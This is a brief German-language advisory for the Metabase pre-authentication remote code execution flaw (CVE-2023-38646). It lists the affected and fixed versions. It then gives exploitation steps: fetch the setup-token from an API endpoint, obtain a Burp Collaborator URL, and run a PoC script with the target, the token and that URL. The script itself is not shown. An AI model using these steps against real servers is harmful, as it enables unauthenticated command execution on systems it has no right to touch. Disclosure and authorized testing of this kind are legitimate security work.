
Metabase Pre-Authentifizierung RCE

Metabase Open Source vor 0.46.6.1 und Metabase Enterprise vor 1.46.6.1 erlauben Angreifern, beliebige Befehle auf dem Server mit den Berechtigungen des Servers auszuführen. Für die Ausnutzung ist keine Authentifizierung erforderlich. Die weiteren behobenen Versionen sind 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 und 1.43.7.2.
Navigieren Sie zu http://vulnerablehost.com/api/session/properties
Ermitteln Sie "setup-token"

Besorgen Sie eine Collaborator-URL (getestet mit BurpSuite)
Führen Sie das PoC-Skript aus mit:
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>